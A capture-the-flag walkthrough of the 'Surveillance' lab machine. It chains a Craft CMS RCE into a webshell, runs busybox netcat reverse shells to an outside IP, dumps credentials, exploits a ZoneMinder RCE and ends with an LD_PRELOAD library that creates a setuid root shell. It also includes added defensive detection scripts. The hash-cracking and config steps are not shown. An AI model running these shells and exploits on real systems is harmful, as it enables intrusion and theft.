Surveillance
Recon
HTTP (80)

Site footer: "SURVEILLANCE.HTB - Powered by Craft CMS", where the Craft CMS link points to https://github.com/craftcms/cms/tree/4.4.14 (i.e. version 4.4.14).
References for the Craft CMS vulnerability (CVE-2023-41892):
https://github.com/0xfalafel/CraftCMS_CVE-2023-41892 (PoC used below)
https://blog.calif.io/p/craftcms-rce
"Exploiting Arbitrary Object Instantiations in PHP without Custom Classes"
└─$ git clone https://github.com/0xfalafel/CraftCMS_CVE-2023-41892.git
└─$ py CraftCMS_CVE-2023-41892/craft-cms.py
Usage: python CraftCMS_CVE-2023-41892/craft-cms.py <url>
└─$ py CraftCMS_CVE-2023-41892/craft-cms.py http://surveillance.htb/
[+] Executing phpinfo to extract some config infos
temporary directory: /tmp
web server root: /var/www/html/craft/web
[+] create shell.php in /tmp
[+] trick imagick to move shell.php in /var/www/html/craft/web
[+] Webshell is deployed: http://surveillance.htb//shell.php?cmd=whoami
[+] Remember to delete shell.php in /var/www/html/craft/web when youre done
[!] Enjoy your shell
> whoami
www-data
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
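From the defender's side, the PoC output above is a compact incident description: a file named shell.php is written into the Craft web root (/var/www/html/craft/web, path taken from the PoC output) and then called with ?cmd=<command>. The following is an added example, not part of the writeup or of the PoC, of the two checks a responder would run on such a box: a scan of the web root for PHP files that hand a request parameter straight to a shell-executing function, and a pass over nginx access-log lines for hits on those files carrying a cmd= parameter. The web root contents and the log lines are constructed inline so it runs offline.

```python
"""Added example, not part of the writeup or of the CraftCMS PoC it runs: two
checks a responder would make after seeing the PoC output above, which drops
shell.php into the Craft web root and calls it with ?cmd=<command>.

  1. scan a web root for .php files that pass a request parameter straight
     into a shell-executing PHP function;
  2. scan nginx access-log lines for hits on such files that carry a cmd=
     parameter.

The web root contents and the log lines are constructed inline.
"""
import os
import re
import shutil
import tempfile
from urllib.parse import parse_qs

# PHP functions that run a string as a shell command
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
# a request superglobal fed directly to one of them, e.g. system($_GET['cmd'])
SHELL_CALL_RE = re.compile(
    r"\b(?:" + "|".join(SHELL_FUNCS) + r")\s*\(\s*\$_(?:GET|POST|REQUEST)\b"
)
# nginx "combined" format: client ident user [time] "METHOD target PROTO" status bytes
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_webshells(web_root):
    """Return paths (relative to web_root) of .php files whose source passes a
    request parameter straight into a shell-executing function."""
    hits = []
    for dirpath, _, files in os.walk(web_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                if SHELL_CALL_RE.search(fh.read()):
                    hits.append(os.path.relpath(path, web_root))
    return sorted(hits)


def suspicious_requests(log_lines, shell_paths):
    """Return (client, path, cmd) for access-log lines that request one of
    shell_paths with a cmd= query parameter. The request target is split by
    hand rather than with urlsplit, because the PoC's URL starts with '//'
    (http://surveillance.htb//shell.php) and urlsplit would read that as a
    host part."""
    found = []
    for line in log_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        client, _, _, target, _ = m.groups()
        path, _, query = target.partition("?")
        if path.lstrip("/") in shell_paths:
            cmd = parse_qs(query).get("cmd", [""])[0]
            found.append((client, path, cmd))
    return found


def demo():
    """Build a throwaway web root holding one benign file and one constructed
    webshell, run both checks, and return (webshells, suspicious requests)."""
    root = tempfile.mkdtemp()
    try:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php require dirname(__DIR__) . '/bootstrap.php';\n")
        with open(os.path.join(root, "shell.php"), "w") as fh:  # constructed sample
            fh.write("<?php system($_GET['cmd']); ?>\n")
        shells = find_webshells(root)
        # constructed log lines modelled on the PoC's requests seen above
        logs = [
            '10.10.14.113 - - [07/Dec/2023:19:20:01 +0000] "GET / HTTP/1.1" 200 5120',
            '10.10.14.113 - - [07/Dec/2023:19:22:10 +0000] "GET //shell.php?cmd=whoami HTTP/1.1" 200 9',
            '10.10.14.113 - - [07/Dec/2023:19:22:15 +0000] "GET //shell.php?cmd=id HTTP/1.1" 200 54',
        ]
        return shells, suspicious_requests(logs, set(shells))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The file scan is deliberately narrow (a superglobal passed directly to a shell function) so it stays quiet on a normal Craft install; the log check keys on the file names the scan found, so the two run as a pair rather than as independent heuristics.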
Upgrade the webshell to a reverse shell:
└─$ pwncat-cs -lp 4444
---
> busybox nc 10.10.14.113 4444 -e /bin/bash
---
(remote) www-data@surveillance:/var/www/html/craft$ cat .env
# Read about configuration, here:
# https://craftcms.com/docs/4.x/config/
# The application ID used to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7
# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=production
# The secure key Craft will use for hashing and encrypting data
CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_
# Database connection settings
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=craftdb
CRAFT_DB_USER=craftuser
CRAFT_DB_PASSWORD=CraftCMSPassword2023!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=
# General settings (see config/general.php)
DEV_MODE=false
ALLOW_ADMIN_CHANGES=false
DISALLOW_ROBOTS=false
PRIMARY_SITE_URL=http://surveillance.htb/
Enumerate the database with the credentials from .env:
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| craftdb |
| information_schema |
+--------------------+
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SHOW TABLES;'
| users |
...
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SELECT username, password, admin FROM users;'
+----------+--------------------------------------------------------------+-------+
| username | password | admin |
+----------+--------------------------------------------------------------+-------+
| admin | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe | 1 |
+----------+--------------------------------------------------------------+-------+
There are three users with a login shell on the box:
(remote) www-data@surveillance:/var/www/html/craft$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash
Hmm.. the bcrypt hash ($2y$13$) is probably not crackable in reasonable time, so giving up on that.
There's a SQL backup in the application's storage directory:
(remote) www-data@surveillance:/var/www/html/craft$ ls -Alh storage/backups/
total 20K
-rw-r--r-- 1 root root 20K Oct 17 2023 surveillance--2023-10-17-202801--v4.4.14.sql.zip
Download the file with pwncat:
(local) pwncat$ download storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip
└─$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip -d backup_sql
Archive: surveillance--2023-10-17-202801--v4.4.14.sql.zip
inflating: backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
└─$ grep surveillance.htb backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
...
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
The admin row in the backup carries a 64-hex-character hash (the length of a SHA-256 digest) rather than the bcrypt hash in the live database, a far weaker target. Leaving old backups readable by the web server user is what made this possible.

SSH (22)
Creds:
matthew:starcraft122490
└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb
matthew@surveillance:~$ id
uid=1000(matthew) gid=1000(matthew) groups=1000(matthew)
User.txt
matthew@surveillance:~$ cat user.txt
a958adc51509dc681d225995433201e0
Privilege Escalation (zoneminder)
No luck with sudo:
matthew@surveillance:~$ sudo -l
Sorry, user matthew may not run sudo on surveillance.
There are other services listening on localhost only:
matthew@surveillance:~$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
matthew@surveillance:/etc/nginx/sites-enabled$ cat zoneminder.conf
server {
listen 127.0.0.1:8080;
root /usr/share/zoneminder/www;
index index.php;
access_log /var/log/zm/access.log;
error_log /var/log/zm/error.log;
location / {
try_files $uri $uri/ /index.php?$args =404;
location ~ /api/(css|img|ico) {
rewrite ^/api(.+)$ /api/app/webroot/$1 break;
try_files $uri $uri/ =404;
}
location /api {
rewrite ^/api(.+)$ /api/app/webroot/index.php?p=$1 last;
}
location /cgi-bin {
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $request_filename;
fastcgi_param HTTP_PROXY "";
fastcgi_pass unix:/run/fcgiwrap.sock;
}
location ~ \.php$ {
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $request_filename;
fastcgi_param HTTP_PROXY "";
fastcgi_index index.php;
fastcgi_pass unix:/var/run/php/php8.1-fpm-zoneminder.sock;
}
}
}
Port forward the application over SSH (local port 800 to 127.0.0.1:8080 on the box):
└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb -L 800:127.0.0.1:8080

Default credentials admin:admin don't work, and the SSH credentials don't work either, but admin:starcraft122490 works!
Creds:
admin:starcraft122490

The ZoneMinder version is v1.36.32, for which there is a public PoC for CVE-2023-26035:
└─$ git clone https://github.com/heapbytes/CVE-2023-26035.git
└─$ py CVE-2023-26035/poc.py --target http://localhost:800/ --cmd 'busybox nc 10.10.14.113 4444 -e /bin/bash'
Fetching CSRF Token
Got Token: key:b3661e65078b87d40b5f49c3e2383a8fbb1288ca,1733601862
[>] Sending payload..
[!] Script executed by out of time limit (if u used revshell, this will exit the script)
---
└─$ pwncat-cs -lp 4444
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ id
uid=1001(zoneminder) gid=1001(zoneminder) groups=1001(zoneminder)
Privilege Escalation (root)
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l
Matching Defaults entries for zoneminder on surveillance:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User zoneminder may run the following commands on surveillance:
(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
(remote) zoneminder@surveillance:/home/zoneminder$ ls /usr/bin/zm[a-zA-Z]*.pl
/usr/bin/zmaudit.pl /usr/bin/zmonvif-probe.pl /usr/bin/zmsystemctl.pl /usr/bin/zmvideo.pl
/usr/bin/zmcamtool.pl /usr/bin/zmonvif-trigger.pl /usr/bin/zmtelemetry.pl /usr/bin/zmwatch.pl
/usr/bin/zmcontrol.pl /usr/bin/zmpkg.pl /usr/bin/zmtrack.pl /usr/bin/zmx10.pl
/usr/bin/zmdc.pl /usr/bin/zmrecover.pl /usr/bin/zmtrigger.pl
/usr/bin/zmfilter.pl /usr/bin/zmstats.pl /usr/bin/zmupdate.pl
Looks like this user can sudo any of the scripts above without a password, but the rule looks tricky so there may be more to it.
The application allows setting the LD_PRELOAD environment variable through its configuration, so build a shared library whose constructor runs when a privileged script loads it:

(remote) zoneminder@surveillance:/tmp$ nano /tmp/pwn.c
(remote) zoneminder@surveillance:/tmp$ cat /tmp/pwn.c
#include <stdio.h>
#include <stdlib.h>     /* unsetenv, system */
#include <sys/types.h>
#include <unistd.h>     /* setgid, setuid: leaving this out is what produced the implicit-declaration warnings below */
/* runs when the library is loaded via LD_PRELOAD; -nostartfiles lets us define _init ourselves */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't re-trigger in the child processes */
    setgid(0);
    setuid(0);
    system("install -m4777 /bin/bash /tmp/rootbash");
}
For some reason gcc wasn't working inside the pwncat-cs session because ld was reported missing (???), so upgrade to an SSH session:
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken
---
(remote) zoneminder@surveillance:/home/zoneminder$ mkdir ~/.ssh
(remote) zoneminder@surveillance:/home/zoneminder$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh zoneminder@surveillance.htb -i id_rsa
zoneminder@surveillance:/tmp$ gcc -fPIC -shared -o /tmp/pwn.so /tmp/pwn.c -nostartfiles
/tmp/pwn.c: In function ‘_init’:
/tmp/pwn.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
/tmp/pwn.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
zoneminder@surveillance:/tmp$ grep LD_PRELOAD /usr/bin/*.pl
/usr/bin/zmdc.pl:if ( $Config{ZM_LD_PRELOAD} ) {
/usr/bin/zmdc.pl: Debug("Adding ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD}");
/usr/bin/zmdc.pl: $ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD};
/usr/bin/zmdc.pl: foreach my $lib ( split(/\s+/, $ENV{LD_PRELOAD} ) ) {
/usr/bin/zmdc.pl: Warning("LD_PRELOAD lib $lib does not exist from LD_PRELOAD $ENV{LD_PRELOAD}.");
LD_PRELOAD is referenced only in zmdc.pl, which exports $Config{ZM_LD_PRELOAD} into the environment of the daemons it starts.
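Two things on this box deserve an audit rather than a guess: how far the sudoers glob /usr/bin/zm[a-zA-Z]*.pl with an unrestricted * argument actually reaches, and which of the scripts it reaches hand a configuration value to LD_PRELOAD, as the grep above shows zmdc.pl doing. The following is an added example (not part of the writeup or of ZoneMinder) that does both in one pass. The directory listing is the 18 names from the ls output above plus two constructed names that must not match, the script sources are constructed excerpts built from the grep output, and the glob is evaluated with Python's fnmatch, which is taken here as an approximation of sudo's own matching.

```python
"""Added example, not part of the writeup or of ZoneMinder: audit the sudoers
spec printed by `sudo -l` above, and check which of the scripts it permits
let a configuration value reach LD_PRELOAD (what the grep above found in
zmdc.pl).

The listing and the script sources are constructed inline; the glob is
evaluated with fnmatch, an approximation of sudo's own matching (assumption).
"""
import fnmatch
import re

# the spec as printed by `sudo -l` above
RULE = "(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *"

# constructed listing: the 18 scripts from the ls output, plus two names that
# sit outside the glob to show where its boundary is
BIN_LISTING = [
    "zmaudit.pl", "zmonvif-probe.pl", "zmsystemctl.pl", "zmvideo.pl",
    "zmcamtool.pl", "zmonvif-trigger.pl", "zmtelemetry.pl", "zmwatch.pl",
    "zmcontrol.pl", "zmpkg.pl", "zmtrack.pl", "zmx10.pl",
    "zmdc.pl", "zmrecover.pl", "zmtrigger.pl",
    "zmfilter.pl", "zmstats.pl", "zmupdate.pl",
    "zm.pl", "zm_helper.sh",  # constructed, outside the glob
]

# constructed excerpts: the zmdc.pl lines are those the grep above returned;
# zmaudit.pl gets an unrelated line so the scan has a negative case
SCRIPT_SOURCES = {
    "zmdc.pl": (
        "if ( $Config{ZM_LD_PRELOAD} ) {\n"
        '  Debug("Adding ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD}");\n'
        "  $ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD};\n"
        "}\n"
    ),
    "zmaudit.pl": "my $Config = ZoneMinder::Config->new();\n",
}

# "(runas) TAG: TAG: /path/pattern args"
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)
# a Perl assignment into the process environment's LD_PRELOAD
ENV_PRELOAD_RE = re.compile(r"\$ENV\{LD_PRELOAD\}\s*=")


def parse_rule(rule):
    """Split one sudoers command spec into run-as, tags, command and args."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError("unrecognised sudoers spec: " + rule)
    tags = [t.rstrip(":") for t in m.group("tags").split()]
    return {"runas": m.group("runas"), "tags": tags,
            "cmd": m.group("cmd"), "args": m.group("args")}


def expand_command(cmd_pattern, listing):
    """Names in listing that the (globbed) command path matches. The directory
    part is dropped because the listing is already that directory."""
    basename = cmd_pattern.rsplit("/", 1)[-1]
    return sorted(n for n in listing if fnmatch.fnmatchcase(n, basename))


def audit(rule, listing, sources):
    """Return what a sudoers reviewer wants to know: is the rule passwordless,
    are arguments unrestricted, which scripts the glob reaches, and which of
    those hand a config value to LD_PRELOAD."""
    spec = parse_rule(rule)
    matched = expand_command(spec["cmd"], listing)
    preload = [n for n in matched if ENV_PRELOAD_RE.search(sources.get(n, ""))]
    return {
        "nopasswd": "NOPASSWD" in spec["tags"],
        "any_args": spec["args"] == "*",
        "matched": matched,
        "sets_ld_preload": preload,
    }


if __name__ == "__main__":
    for key, value in audit(RULE, BIN_LISTING, SCRIPT_SOURCES).items():
        print(f"{key}: {value}")
```

The combination the audit flags is the one that matters here: a passwordless rule, a wildcard in the command path that expands to 18 scripts, a bare * that permits any arguments, and at least one of those scripts that turns a user-editable config value into LD_PRELOAD for root processes. Any one of the four alone is far less of a problem than all four together.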
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl version
1.36.32
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbash
ls: cannot access '/tmp/rootbash': No such file or directory
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl -h
No daemon given
Usage:
zmdc.pl {command} [daemon [options]]
Options:
{command} - One of 'startup|shutdown|status|check|logrot' or
'start|stop|restart|reload|version'. [daemon [options]] - Daemon name
and options, required for second group of commands
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl startup zoneminder
Starting server
zoneminder@surveillance:/tmp$ ls -l
total 1416
-rw------- 1 www-data www-data 200 Dec 7 19:22 phpylNcsK
-rw-r--r-- 1 zoneminder zoneminder 192 Dec 7 20:15 pwn.c
-rwxrwxr-x 1 zoneminder zoneminder 14344 Dec 7 20:23 pwn.so
-rwsrwxrwx 1 root root 1396520 Dec 7 20:33 rootbash
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-ModemManager.service-M9fPjK
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-logind.service-URkGsr
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-resolved.service-S1o5w6
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-timesyncd.service-weSxYN
-rw-r--r-- 1 zoneminder zoneminder 2137 Dec 7 20:31 t.sh
drwx------ 2 root root 4096 Dec 7 19:12 vmware-root_776-2965448177
drwxr-xr-x 2 www-data www-data 4096 Dec 7 19:11 zm
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Dec 7 20:33 /tmp/rootbash
The version command doesn't trigger the preload, but startup does, because only the daemon-starting path sets LD_PRELOAD.
Root.txt
zoneminder@surveillance:/tmp$ /tmp/rootbash -p
rootbash-5.1# id
uid=1001(zoneminder) gid=1001(zoneminder) euid=0(root) groups=1001(zoneminder)
rootbash-5.1# cat /root/root.txt
bcfcd349bb8b30f067008b14fd26c079